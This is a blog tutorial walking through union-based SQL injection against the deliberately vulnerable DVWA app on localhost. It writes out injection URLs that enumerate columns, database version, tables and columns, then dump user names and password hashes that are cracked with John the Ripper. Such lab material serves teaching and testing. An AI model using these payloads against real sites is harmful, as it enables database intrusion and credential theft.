11 December, 2018
MENU
mobile-logo
HomeHacking ArticlesUnion Based Injection using John the Ripper
Hacking Articles

Union Based Injection using John the Ripper

Meet Hackers
0 Comments

Union Based Injection using John the Ripper

System used :: Kali Linux

Testing on localhost :: 127.0.0.1/login.php (DVWA)

  • Open Xampp on Linux and Start MySQL and Apache Server


  • Open Iceweasel and write 127. 0 . 0.1/login.php

Login to the Application

Username : admin , Password : password

    • Setup the security level from ‘High’ to ‘Low’ under DVWA security

    • Setup the Database under Setup tab

    • Click on SQL injection to begin testing

  • Enter 1 in the User ID Field

User sees the GET method

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#

  • Check for Exception Handling

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1’&Submit=Submit#

  • Checking using the True Conditions

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=$’ or ‘1’=’1&Submit=Submit#

The above injection reveal the user id’s in the userdb database.

  • Checking for number of columns, returning the SQL query

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1’ order by 1–+&Submit=Submit#

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1’ order by 5–+&Submit=Submit#

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1’ order by 3–+&Submit=Submit#

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1’ order by 2–+&Submit=Submit#


This shows the number of columns are 2

  • Using ‘Union Select’ to consolidate 2 columns

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1’ union select 1, 2–+&Submit=Submit#

  • For vulnerable columns, make id=-1

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-1’ union select 1, 2–+&Submit=Submit#

  • Check for version

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-1’ union select null, version()–+&Submit=Submit#

  • To search for database, version and user

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-1’ union select concat(database(), ‘ ‘, version()), user()–+&Submit=Submit#

  • To search for corresponding details

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-1’ union select null, table_name from information_schema.tables –+&Submit=Submit#

  • For checking specific table, example ‘users’ , in the particular database, here

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-1’ union select null, table_name from information_schema.tables  where table_name = “users%”–+&Submit=Submit#

This SQL query will display all the tables consisting of keyword “users”

  • Under ‘users’ table, checking for column names

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-1’ union select null, column_name from information_schema.columns  where table_name = “users”–+&Submit=Submit#

  • Checking and consolidation all the details of all the columns:

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-1’ union select concat(user_id,’ ‘,first_name,’ ‘,last_name,’ ‘avatar),concat(user,’ ‘,password) from users–+&Submit=Submit#

    • Copy the users & passwords and save them in <user>:<password> format in “password.txt” file under /Home


    • Using John the Ripper application for cracking the password, with format md5

Hence we have user names & their corresponding passwords.

This is tutorial is by lucideus (rahul tyagi ) Images Quality may not good so that post can load in a proper time ,stay tuned for more tutorials

Read More :Special Interview of India’s Famous White Hat Hacker Rahul Tyagi | Lucideus

Over 500 Hacked Face
how to hack website
Rate This Article:
RELATED ARTICLES
Hacking Articles
Top 5 People Who Ear
Hacking Articles
500 Emails and Passw
Hacking Articles
Meet the hackers who
NO COMMENTS

LEAVE A COMMENT

About us

Here at meethackers.com, we provide platform to all the experts across the world to share their experiences, and express their views and ideas of being expertise in this field. All the articles shared on this website are authentic and if in case any experts would like to guide it better, are always welcomed. Because there is always a room for betterment each day!!!

Welcome to the amazing digital world of hacking.